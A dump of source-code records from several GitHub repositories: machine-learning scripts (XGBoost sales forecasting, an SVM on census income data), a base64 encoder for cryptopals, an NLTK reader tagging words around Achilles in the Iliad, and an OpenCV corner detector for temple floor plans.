evals=watchlist,\n early_stopping_rounds=100, feval=rmspe_xg, verbose_eval=True)\n\n yhat = gbm.predict(xgb.DMatrix(ho_xtest))\n\n L = range(1115)\n W_ho = []\n W_test = []\n for i in L:\n s1 = pd.DataFrame(res[res['Store'] == i + 1], columns=col_1)\n s2 = pd.DataFrame(xtest[xtest['Store'] == i + 1])\n W1 = [(0.990 + (i / 1000)) for i in range(20)]\n S = []\n for w in W1:\n error = rmspe(np.expm1(s1.Sales), np.expm1(s1.Prediction * w))\n S.append(error)\n Score = pd.Series(S, index=W1)\n BS = Score[Score.values == Score.values.min()]\n a = np.array(BS.index.values)\n b_ho = a.repeat(len(s1))\n b_test = a.repeat(len(s2))\n W_ho.extend(b_ho.tolist())\n W_test.extend(b_test.tolist())\n\n yhat_ho = yhat * W_ho\n yhat_test = gbm.predict(xgb.DMatrix(xtest)) * W_test\n error = rmspe(np.expm1(ho_ytest), np.expm1(yhat_ho))\n B.append(error)\n preds_ho[:, r] = yhat_ho\n preds_test[:, r] = yhat_test\n print('round {} end'.format(r + 1))\n\nend = time()\ntime_elapsed = end - start\nprint('Training is end')\nprint('Training time is {} h.'.format(time_elapsed / 3600))\n\n# In[34]:\n\n\n# 分析不同模型的相关性\npreds = pd.DataFrame(preds_ho)\nsns.pairplot(preds)\n\n# - 模型融合可以采用简单平均或者加权重的方法进行融合。从上图来看,这10个模型相关性很高,差别不大,所以权重融合我们只考虑训练中单独模型在hold-out模型中的得分情况分配权重。\n\n# In[35]:\n\n\n# 模型融合在hold-out数据集上的表现\n\n# 简单平均融合\nprint ('Validating')\n\nbagged_ho_preds1 = preds_ho.mean(axis=1)\nerror1 = rmspe(np.expm1(ho_ytest), np.expm1(bagged_ho_preds1))\nprint('RMSPE for mean: {:.6f}'.format(error1))\n\n# 加权融合\nR = range(10)\nMw = [0.20, 0.20, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.00, 0.00]\nA = pd.DataFrame()\nA['round'] = R\nA['best_score'] = B\nA.sort_values(['best_score'], inplace=True)\nA['weight'] = Mw\nA.sort_values(['round'], inplace=True)\nweight = np.array(A['weight'])\npreds_ho_w = weight * preds_ho\nbagged_ho_preds2 = preds_ho_w.sum(axis=1)\nerror2 = rmspe(np.expm1(ho_ytest), np.expm1(bagged_ho_preds2))\nprint('RMSPE for weight: {:.6f}'.format(error2))\n\n# - 权重模型较均值模型有比较好的得分\n\n# In[36]:\n\n\n##用均值融合和加权融合后的模型对训练数据集进行预测\n# 均值融合\nprint(\"Make predictions on the test set\")\nbagged_preds = preds_test.mean(axis=1)\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(bagged_preds)})\nresult.to_csv(\"Rossmann_submission_4.csv\", index=False)\n# 加权融合\nbagged_preds = (preds_test * weight).sum(axis=1)\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(bagged_preds)})\nresult.to_csv(\"Rossmann_submission_5.csv\", index=False)\n\n# 8.模型特征重要性及最佳模型结果分析\n\n# In[37]:\n\n\n# 模型特征重要性\nxgb.plot_importance(gbm)\n\n# - 从模型特征重要性分析,比较重要的特征有四类包括1.周期性特征'Day','DayOfWeek','WeekOfYera','Month'等,可见店铺的销售额与时间是息息相关的,尤其是周期较短的时间特征;2.店铺差异'Store'和'StoreTyp'特征,不同店铺的销售额存在特异性;3.短期促销(Promo)情况:'PromoOpen'和'Promo'特征,促销时间的长短与营业额相关性比较大;4.竞争对手相关特征包括:'CompetitionOpen',‘CompetitionDistance','CompetitionOpenSinceMoth'以及'CompetitionOpenScinceyear',竞争者的距离与营业年限对销售额有影响。\n# - 作用不大的特征主要两类包括:1.假期特征:'SchoolHoliday'和'StateHoliday',假期对销售额影响不大,有可能是假期店铺大多不营业,对模型预测没有太大帮助。2.持续促销(Promo2)相关的特征:'Promo2','Prom2SinceYear'以及'Prom2SinceWeek'等特征,有可能持续的促销活动对短期的销售额影响有限。\n\n# In[38]:\n\n\n# 采用新的权值融合模型构建保留数据集预测结果\nres1 = pd.DataFrame(data=ho_ytest)\nres1['Prediction'] = bagged_ho_preds2\nres1 = pd.merge(ho_xtest, res1, left_index=True, right_index=True)\nres1['Ratio'] = res1.Prediction / res.Sales\nres1['Error'] = abs(res1.Ratio - 1)\nres1.head()\n\n# In[39]:\n\n\n# 分析偏差最大的10个预测结果与初始模型差异\nres1.sort_values(['Error'], ascending=False, inplace=True)\nres['Store_new'] = res1['Store']\nres['Error_new'] = res1['Error']\nres['Ratio_new'] = res1['Ratio']\ncol_3 = ['Store', 
'Ratio', 'Error', 'Store_new', 'Ratio_new', 'Error_new']\ncom = pd.DataFrame(res, columns=col_3)\ncom[:10]\n\n# - 从新旧模型预测结果最大的几个偏差对比的情况来看,最终的融合模型在这几个预测值上大多有所提升,证明模型的校正和融合确实有效。\n\n"
},
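The script above trains XGBoost on np.log1p(Sales) and inverts with np.expm1 before scoring with RMSPE (root mean square percentage error). A minimal numpy-only sketch of that metric and the log round-trip, on made-up sales figures:

import numpy as np

def rmspe(y, yhat):
    return np.sqrt(np.mean((yhat / y - 1) ** 2))

sales = np.array([5263.0, 6064.0, 8314.0])   # made-up daily sales
log_target = np.log1p(sales)                 # what the model is trained on
pred = np.expm1(log_target * 1.001)          # invert a slightly-off prediction
print(rmspe(sales, pred))                    # small relative error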
{
"alpha_fraction": 0.4589427411556244,
"alphanum_fraction": 0.47701629996299744,
"avg_line_length": 28.996864318847656,
"blob_id": "a5fb5cca313837bbb84f4ef0bd7baa4b7a0606c4",
"content_id": "263b7e9035698ddb7cb4d328ab1f2c1a40ee233d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9668,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 319,
"path": "/perceptron/SVM.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import csv\nimport math\nimport random\nimport matplotlib.ticker as ticker\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import explained_variance_score\n\n\nclass Data_Proccess:\n def __init__(self, mode):\n self.mode = mode\n self.heads = []\n\n def read_data(self, path):\n data = []\n with open(path, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for i in reader:\n if '\"?\"' not in i:\n data.append(i)\n return data\n\n def preprocess_data(self, data):\n l, ll = len(data), len(data[0])\n heads = data[0]\n categories = {}\n nomalize = {}\n for i in range(l):\n if i == 1:\n for j in range(ll):\n if self.isnumber(data[i][j]):\n data[i][j] = float(data[i][j])\n nomalize[j] = data[i][j]\n else:\n if j in categories:\n categories[j].add(data[i][j])\n else:\n categories[j] = {data[i][j]}\n if i > 1:\n for j in range(len(data[i])):\n if j in categories:\n if data[i][j] not in categories[j]:\n categories[j].add(data[i][j])\n else:\n data[i][j] = float(data[i][j])\n if j in nomalize:\n nomalize[j] = max(data[i][j], nomalize[j])\n else:\n nomalize[j] = data[i][j]\n self.heads = heads\n return heads, categories, data, nomalize\n\n def isnumber(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def quantize(self, categories, label):\n dic = {}\n for i in categories:\n if i != label:\n l = len(categories[i])\n for j, k in enumerate(categories[i], start=1):\n dic[k] = j / l\n else:\n q = -1\n for j, k in enumerate(categories[i], start=1):\n dic[k] = pow(q, j)\n return dic\n\n def deal_data(self, dic, data, categories):\n l, ll = len(data), len(data[0])\n for i in range(1, l):\n for j in categories:\n data[i][j] = dic[data[i][j]]\n return np.array(data[1:])\n\n def nomalize(self, nomalize, data):\n l, ll = len(data), len(data[0])\n for i in range(l):\n for j in nomalize:\n data[i][j] = data[i][j] / float(nomalize[j])\n\n def cross_validation(self, data, number):\n div = len(data) // number\n np.random.shuffle(data)\n test_data = data[: div]\n training_data = data[div:]\n return test_data, training_data\n\n def find_negative(self, trainset):\n po, ne = [], []\n for i in trainset:\n if i[-1] == 1.0:\n po.append(i)\n else:\n ne.append(i)\n return np.array(po), np.array(ne)\n\n def information_gain(self, col, data):\n categories = {}\n for i in data[1:]:\n q = i[col] // 0.1\n if q in categories:\n if i[-1] in categories[q]:\n categories[q][i[-1]] += 1\n else:\n categories[q][i[-1]] = 1\n else:\n categories[q] = {i[-1]: 1}\n ecol = self.entropy(categories, len(data) - 1)\n return ecol\n #self.plot(col, categories)\n\n def entropy(self, dic, s):\n e = 0\n for i in dic:\n se, su = self.e(dic[i])\n e += se * su / s\n return e\n\n def e(self, dic):\n # dic: -1:x, 1:y\n s = sum(dic.values())\n e = 0\n for i in dic:\n e += self.one_entropy(dic[i], s)\n return e, s\n\n def plot(self, col, cat):\n head = self.heads[col]\n x = list(cat.keys())\n if type(x[0]) is float:\n x.sort()\n po = []\n na = []\n for i in x:\n if '\"<=50K\"' in cat[i]:\n na.append(cat[i]['\"<=50K\"'])\n else:\n na.append(0)\n if '\">50K\"' in cat[i]:\n po.append(cat[i]['\">50K\"'])\n else:\n po.append(0)\n width = 0.5\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ind = np.arange(1, len(x)+1)\n if type(x[0]) is float:\n plt.plot([i - width / 2 for i in x], po, color='blue', linestyle='-')\n plt.plot([i + width / 2 for i in 
x], na, color='orange', linestyle=':')\n else:\n plt.bar([i - width / 2 for i in ind], po, facecolor='red', width=width, edgecolor='white', label='>50', lw=1)\n plt.bar([i + width / 2 for i in ind], na, alpha=1, width=width, facecolor='yellowgreen', edgecolor='white',\n label='<=50', lw=1)\n plt.xticks(ind, x)\n ax.set_xticklabels(x, rotation=50)\n plt.xlabel(head)\n plt.ylabel('amount')\n plt.legend(loc='upper right')\n plt.show()\n fig.savefig(f'{head}.png')\n\n def one_entropy(self, a, sums):\n return -a / sums * math.log(a / sums, 2)\n\n def ent(self, x):\n dic = {}\n for i in x:\n if i in dic:\n dic[i] += 1\n else:\n dic[i] = 1\n sums = sum(dic.values())\n e = 0\n for i in dic:\n e += self.one_entropy(dic[i], sums)\n return e\n\n def visualize(self, positive, negative, q, data, label, dual, _gamma):\n\n plt.xlabel('X1') # 横坐标\n\n plt.ylabel('X2') # 纵坐标\n\n plt.scatter(positive[:, 0], positive[:, 1], c='b', marker='+', alpha=0.5) # +1样本红色标出\n\n plt.scatter(negative[:, 0], negative[:, 1], c='g', marker='o', alpha=0.5) # -1样本绿色标出\n nonZeroAlpha = dual[0]\n\n supportVector = data # 支持向量\n\n y = label[q] # 支持向量对应的标签\n\n plt.scatter(supportVector[:, 0], supportVector[:, 1], s=80, c='y', alpha=0.5, marker='o') # 标出支持向量\n\n print(\"支持向量个数:\", len(q))\n\n X1 = np.arange(0, 1, 0.05)\n\n X2 = np.arange(0, 1, 0.05)\n\n x1, x2 = np.meshgrid(X1, X2)\n\n g = _gamma\n\n for i in range(len(q)):\n # g+=nonZeroAlpha[i]*y[i]*(x1*supportVector[i][0]+x2*supportVector[i][1])\n\n g += nonZeroAlpha[i] * y[i] * np.exp(\n -0.5 * ((x1 - supportVector[i][0]) ** 2 + (x2 - supportVector[i][1]) ** 2) / (g ** 2))\n\n plt.contour(x1, x2, g, 0, cmap=plt.cm.coolwarm) # 画出超平面\n\n plt.title(\"decision boundary\")\n\n plt.show()\n\n\nif __name__ == '__main__':\n s = Data_Proccess('SVM')\n data = s.read_data('adult.csv')\n heads, categories, data, nomalize = s.preprocess_data(data)\n en = []\n\n lo = len(data[0]) - 1\n dic = s.quantize(categories, lo)\n data = s.deal_data(dic, data, categories)\n s.nomalize(nomalize, data)\n print('Nomalized')\n print('Sample number: ', len(data))\n basic_e = s.ent(data[:, -1])\n print('Basic entropy is: ', basic_e)\n pass\n for i in range(len(heads) - 1):\n en.append((i, heads[i], s.information_gain(i, data)))\n en.sort(key=lambda x: x[2])\n print('Information gain:')\n for i in en:\n print(i)\n e = np.array(en)\n\n\n name_list = np.array(e[:,1])\n num_list = np.array(e[:,2])\n\n test_data, train_data = s.cross_validation(data, 10)\n\n print('cross validation')\n\n #np.save('tests', test_data)\n #np.save('trains', train_data)\n\n trainset = train_data[:, :-1]\n label = train_data[:, -1]\n\n test_set = test_data[:, :-1]\n real_label = test_data[:, -1]\n print('SVM working:')\n #SVMClassifier = SMO(trainset, label, 1, 0.001, 40)\n #SVMClassifier.visualize(po, ne)\n\n pp = []\n nn = []\n for i in range(len(label)):\n if label[i] == 1:\n pp.append(trainset[i])\n else:\n nn.append(trainset[i])\n pp = np.array(pp)\n nn = np.array(nn)\n\n #clf = svm.SVC(kernel='poly', degree=3, C=150)\n #clf = svm.SVC(kernel='linear')\n clf = svm.SVC(kernel='rbf',gamma= 0.7, C =150)\n clf.fit(trainset, label)\n ans = clf.predict(test_set)\n #plt.scatter(pp[:, 0], pp[:, 1], marker='1', c='g')\n #plt.scatter(nn[:, 0], nn[:, 1], marker='4', c='k')\n count,tp,tn,fp, fn= 0,0,0,0,0\n\n for i in range(len(ans)):\n if ans[i] == real_label[i] and real_label[i] == 1:\n tp += 1\n count += 1\n\n if ans[i] == real_label[i] and real_label[i] == -1:\n tn += 1\n count += 1\n\n if ans[i] != real_label[i] and real_label[i] == 
-1:\n fp += 1\n\n if ans[i] != real_label[i] and real_label[i] == 1:\n fn += 1\n\n sup = clf.support_\n dual = clf.dual_coef_\n s.visualize(pp, nn, sup, clf.support_vectors_, label, dual, clf._gamma)\n tru = np.array(real_label)\n pre = np.array(ans)\n print(count)\n precision = tp/(tp+fp)\n recall = tp/(tp+fn)\n f1score = 2*precision*recall/(precision+recall)\n print('precision: ',precision,' recall: ',recall,' f1score: ',f1score)\n V = explained_variance_score(tru, pre)\n print('variance: ',V)\n #plt.scatter(sup[:, 0], sup[:, 1], c='b', marker='>')\n #plt.show()\n print('The training accuracy:', count / len(ans))\n\n\n\n"
},
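The evaluation block above tallies tp/tn/fp/fn with explicit loops; the same counts fall out of sklearn.metrics.confusion_matrix. A minimal sketch with made-up +1/-1 labels:

import numpy as np
from sklearn.metrics import confusion_matrix

truth = np.array([1, 1, -1, -1, 1, -1])   # made-up ground truth
pred = np.array([1, -1, -1, 1, 1, -1])    # made-up predictions
tn, fp, fn, tp = confusion_matrix(truth, pred, labels=[-1, 1]).ravel()
precision = tp / (tp + fp)
recall = tp / (tp + fn)
print(precision, recall, 2 * precision * recall / (precision + recall))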
{
"alpha_fraction": 0.570806086063385,
"alphanum_fraction": 0.6394335627555847,
"avg_line_length": 40.54545593261719,
"blob_id": "1b3efe71c4f5dd9ea7f4cedec3d5000efd731de5",
"content_id": "9183f07b1ae222c39892bab01145c84698bcedd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 22,
"path": "/perceptron/ir.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "from numpy import *\nimport numpy as np\ndef Caculate_IR(retrieved,relevant):\n recall = []\n precision = []\n f1score = []\n interprecision = []\n for i in range(10):\n precision.append(100*relevant[i]/retrieved[i])\n recall.append(100*relevant[i] / 200)\n f1score.append(2*precision[i]*recall[i]/(precision[i]+recall[i]))\n interprecision.append(precision[9])\n for i in range(9, 0, -1):\n temp = max(precision[i-1],precision[i])\n interprecision.append(temp)\n interprecision.reverse()\n return recall,precision, f1score, interprecision\nif __name__ == '__main__':\n retrieved = [10,20,30,40,50,60,70,80,90,100]\n relevant =[7,14,20,27,30,35,37,40,40,40]\n recall, precision, f1score, interprecision = Caculate_IR(retrieved, relevant)\n print('precision: ', precision, ' recall: ', recall, ' f1score: ', f1score, 'interprecision: ', interprecision)\n\n\n\n\n"
},
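The interpolation loop in ir.py above is a running maximum taken from the high-recall end; numpy expresses the same operation in one call. A minimal sketch on a made-up precision curve:

import numpy as np

precision = np.array([70.0, 70.0, 66.7, 67.5, 60.0, 58.3, 52.9, 50.0, 44.4, 40.0])
interp = np.maximum.accumulate(precision[::-1])[::-1]
print(interp)   # each entry: best precision at this recall level or beyond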
{
"alpha_fraction": 0.5420219302177429,
"alphanum_fraction": 0.5706455707550049,
"avg_line_length": 24.27692222595215,
"blob_id": "ac430a3d9a542d24132f1d3d6bfc3fe9fd70b1ae",
"content_id": "36a4288225fd4e9b1f00a115013aa851fd230317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 65,
"path": "/perceptron/plottest.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport scipy\nfrom sklearn import svm\n\ndef loadDataSet(filename):\n a=np.load(filename)\n dataset=[]\n labels=[]\n for i in a:\n x,y=i[2],i[7]\n dataset.append([x,y])\n labels.append(i[14])\n return np.array(dataset), np.array(labels)\n\ndef main():\n data='nomalized_samples.npy'\n feature, lable = loadDataSet(data)\n dataArr_test = feature[:1000]\n labelArr_test = lable[:1000]\n x1_samples = []\n x2_samples = []\n\n for i in range(900):\n q = dataArr_test[i]\n\n if labelArr_test[i] == 1:\n x1_samples.append(q)\n else:\n x2_samples.append(q)\n x1 = np.array(x1_samples)\n x2 = np.array(x2_samples)\n\n fig = plt.figure()\n\n plt.scatter(x1[:,0], x1[:,1], marker='+')\n plt.scatter(x2[:,0], x2[:,1], c='green', marker='o')\n\n X = np.concatenate((x1, x2), axis=0)\n Y = np.array(labelArr_test)\n\n C = 200.0 # SVM regularization parameter\n clf = svm.SVC(kernel='rbf', gamma=0.7, C=C)\n clf.fit(X, Y)\n\n h = .02 # step size in the mesh\n # create a mesh to plot in\n x_min, x_max = 0,1\n y_min, y_max = 0,1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # Plot the decision boundary. For that, we will assign a color to each\n # point in the mesh [x_min, m_max]x[y_min, y_max].\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.contour(xx, yy, Z, cmap=plt.cm.Paired)\n\n plt.show()\n\nif __name__=='__main__':\n main()"
}
] | 9 |
bogatyy/cryptopals | https://github.com/bogatyy/cryptopals | 09bf26d89632521fdd280460a4c052dbfc819fcf | 2b580c6cfc780726fdf1a9c8e1fd3c5078d1b8e8 | 8ce31d9acc97133df4e2438939a24f1a8ab6208d | refs/heads/master | 2022-04-20T02:54:31.287461 | 2020-04-22T10:52:58 | 2020-04-22T10:52:58 | 256,513,118 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.43881526589393616,
"alphanum_fraction": 0.5339049100875854,
"avg_line_length": 29.547618865966797,
"blob_id": "5c4e973a18fd8a61ba34a569c974cabd808c5cc2",
"content_id": "6351b9989caf3b22f610a4d358d505bdc3e05bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1283,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 42,
"path": "/set_1/challenge_1.py",
"repo_name": "bogatyy/cryptopals",
"src_encoding": "UTF-8",
"text": "import base64\nfrom hexbytes import HexBytes\n\ndef encode_base64(ascii_string):\n binary = ''.join(\n format(ord(symbol), '08b')\n for symbol in ascii_string\n )\n extra_zeros = (6 - len(binary) % 6) % 6\n binary += '0' * extra_zeros\n sextets = [binary[i:i + 6] for i in range(0, len(binary), 6)]\n chars = []\n for sextet in sextets:\n value = int(sextet, 2)\n if value < 26:\n chars.append(chr(ord('A') + value))\n elif value < 26 * 2:\n chars.append(chr(ord('a') + value - 26))\n elif value < 26 * 2 + 10:\n chars.append(chr(ord('0') + value - 26 * 2))\n elif value == 62:\n chars.append('+')\n elif value == 63:\n chars.append('/')\n else:\n raise TypeError('wtf')\n padding_size = (3 - len(ascii_string) % 3) % 3\n return ''.join(chars) + '=' * padding_size\n\n\nif __name__ == '__main__':\n inputs = [\n HexBytes('49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d').decode(),\n 'Man',\n 'pleasure.',\n 'leasure.',\n 'easure.',\n 'asure.',\n 'sure.',\n ]\n for input in inputs:\n print(input, encode_base64(input), base64.b64encode(input.encode()))\n"
},
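The if/elif chain in encode_base64 above is a hand-rolled lookup into the standard base64 alphabet (A-Z, a-z, 0-9, '+', '/'); indexing a 64-character string expresses the same mapping directly. A minimal sketch of the boundary cases, checked against the standard library:

import base64

ALPHABET = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ'
            'abcdefghijklmnopqrstuvwxyz'
            '0123456789+/')

for value in (0, 25, 26, 61, 62, 63):
    print(value, ALPHABET[value])   # the boundary cases of the chain above
print(base64.b64encode(b'Man'))     # b'TWFu', the reference encoding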
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "eb588925218c2b5247a5b270ab8abb704460fb40",
"content_id": "257f467278f0fe32cce6267a8233b2cc488e45d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bogatyy/cryptopals",
"src_encoding": "UTF-8",
"text": "# cryptopals\nMy solutions for https://cryptopals.com/\n"
}
] | 2 |
amkaminski/PersonalProjects-LogosEndiathetos | https://github.com/amkaminski/PersonalProjects-LogosEndiathetos | 42feb7caa0619d9949725cdc257410c9157c3426 | ab4ef2a8b7bfb21f3ac722e69b898cd0933a1aa5 | f22851a5414f59f588810f5901ec74306d2e583e | refs/heads/master | 2023-04-17T07:37:57.515632 | 2021-05-02T20:20:54 | 2021-05-02T20:20:54 | 234,774,523 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5134291052818298,
"alphanum_fraction": 0.5262336134910583,
"avg_line_length": 19.95833396911621,
"blob_id": "5a829fabb8d357f05889ebff7ae79bed1f7d6c93",
"content_id": "f2c023719e0c1a3b5ee9eda5293d6c9d3ef8ddd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3202,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 144,
"path": "/Illiad_Reader/ReadHomer.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 11:26:36 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\n#import statements\r\n\r\n\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\n\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0',}\r\n\r\nxml = ET.parse(file).getroot()\r\n \r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n \r\npara = []\r\n \r\nfor card in cards:\r\n para.append(' '.join(card.itertext()))\r\n \r\nplaintext = []\r\n\r\n\r\n# loop over xml chapter elements\r\nfor card in cards:\r\n \r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n \r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n \r\n # add to long string\r\n plaintext.append(this_text)\r\n \r\n# now paste it all together\r\niliad = ' '.join(plaintext) \r\n\r\n#look for Achilles\r\ndef paraHasAchilles(para):\r\n \r\n result = False\r\n \r\n if 'Achil' in para:\r\n result = True\r\n elif 'Peleus' in para:\r\n result = True\r\n \r\n return result\r\n#import os\r\n#from nltk.parse import stanford\r\n \r\nsentences = nltk.sent_tokenize(iliad)\r\n\r\ntokens = nltk.word_tokenize(sentences[2])\r\n\r\n#this is where we have a problem\r\ntagged = nltk.pos_tag(tokens)\r\n\r\nadjs = []\r\nnouns = []\r\n\r\n#for para in iliad:\r\n #if paraHasAchilles(para):\r\n \r\n #for tok, pos in tagged: \r\n #if pos == 'JJ':\r\n #adjs.append(tok)\r\n #elif pos.startswith('NN'):\r\n #nouns.append(tok)\r\n \r\n #print('adjs: ', adjs)\r\n #print('nouns: ', nouns)\r\n \r\n\r\nfor sentence in sentences:\r\n if paraHasAchilles(sentence):\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n for tok, pos in tagged:\r\n if pos == 'JJ':\r\n adjs.append(tok)\r\n elif pos.startswith('NN'):\r\n nouns.append(tok)\r\n\r\n#print('adjs: ', adjs) \r\n#print('nouns: ', nouns) \r\n \r\ndef chunks(l, n):\r\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n \r\n#counter = 0\r\nstep = 100\r\nposWrds = []\r\nnegWrds = []\r\n\r\ncounter = 0\r\nfor word in adjs:\r\n counter = counter + 1\r\n #correct operator for divisible by 100? \r\n if counter % step == 0:\r\n #if a word matches a word in \"posWords\" increase a count and add that count to a list\r\n \r\n \r\n \r\n \r\nposWords = \"valiant, brilliant, swift-footed, glorious, great-hearted, godlike, godly, fair, great\"\r\nnegWords = \"perish, perished, fatal, distressed, bitter, hollow, dead, evil\"\r\n\r\n\r\n\r\n\r\n#posCount = 0\r\n#negCount = 0\r\n\r\n#adj = str(adjs)\r\n#non = str(nouns)\r\n\r\n\r\n\r\n#for word in adj:\r\n #for i in posWords.split():\r\n #posCount = 0\r\n #test = []\r\n #if word == i:\r\n #posCount = posCount + 1\r\n #test.append(word)\r\n#print('PosCount: ', posCount)\r\n \r\n#for word in non:\r\n #for i in negWords.split():\r\n #negCount = 0\r\n #if word == i:\r\n #negCount = negCount + 1\r\n#print('NegCount: ', negCount)\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n "
},
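The counting loop in ReadHomer.py above records lexicon hits per 100-adjective window; the same idea reads even more directly with list slicing. A minimal sketch with toy data:

words = ["great", "dead", "fair", "bitter"] * 50   # 200 toy adjectives
positive = {"great", "fair"}

step = 100
counts = [sum(1 for w in words[i:i + step] if w in positive)
          for i in range(0, len(words), step)]
print(counts)   # one positive-hit count per window -> [50, 50]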
{
"alpha_fraction": 0.6104611158370972,
"alphanum_fraction": 0.6421197652816772,
"avg_line_length": 23.086206436157227,
"blob_id": "31e7448253c4904ff31c5be62e0e1ccfa767f341",
"content_id": "42fa3ab31ee3e98a712d5eab89693a2180461077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 58,
"path": "/TempleLayout_Analyzer/HarrisCornerDetect2-Iter.2.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 5 14:07:06 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n#a = np.array(aList[]) then they become booliens\r\n#a > 0 gives us an array of booliens\r\n#sum(a > 0) returns all trues\r\nfilename = 'TempleTeos.jpg'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nthreshold = 30\r\n\r\nTempleWidth = []\r\nfor y in range(len(dst)):\r\n TempleWidths=[]\r\n for x in range(len(dst[0])):\r\n if dst[y, x] > threshold:\r\n TempleWidths.append(dst[y, x])\r\n TempleWidth.append(int(len(TempleWidths)))\r\n \r\nTempleHeight=[]\r\nfor x in range(len(dst[0])):\r\n TempleHeights=[]\r\n for y in range(len(dst)):\r\n if dst[y, x] > threshold:\r\n TempleHeights.append(dst[y, x])\r\n TempleHeight.append(int(len(TempleHeights)))\r\n\r\nWidthPeaks = []\r\nTempleWidth.sort(reverse=True)\r\n#WidthPeaks.append(TempleWidth[0])\r\n#WidthPeaks.append(TempleWidth[1])\r\n#WidthPeaks.append(TempleWidth[:10])\r\n\r\n#dec = zip(TempleWidth, range(len(TempleWidth)))\r\n#for w, p in list(sorted(dec, reverse=True))[:5]:\r\n# print(w, p)\r\n\r\n#len(img_dilation)\r\n\r\n#Take the two spikes from each list\r\n#and use the (x, y) vals of each to \r\n#determine edges of the temple stylobate\r\ncv2.imwrite('output_TempleTeos.jpg', img)"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.6875,
"avg_line_length": 25.75,
"blob_id": "ba7d9dccef3158d855f4964cc3a4102903800707",
"content_id": "b925fed6415ba59a66bbd058d36cdacb1d32799b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 8,
"path": "/Illiad_Reader/HomerReader.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 11:02:02 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nURL = 'https://raw.githubusercontent.com/PerseusDL/canonical-greekLit/master/data/tlg0012/tlg001/tlg0012.tlg001.perseus-eng3.xml'\r\n\r\n"
},
{
"alpha_fraction": 0.6592920422554016,
"alphanum_fraction": 0.6814159154891968,
"avg_line_length": 23.45945930480957,
"blob_id": "d8e91617c99ae63909bc3669908ca43b9e5a34a4",
"content_id": "a3784bab9934276c598679b138effd6425449fb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
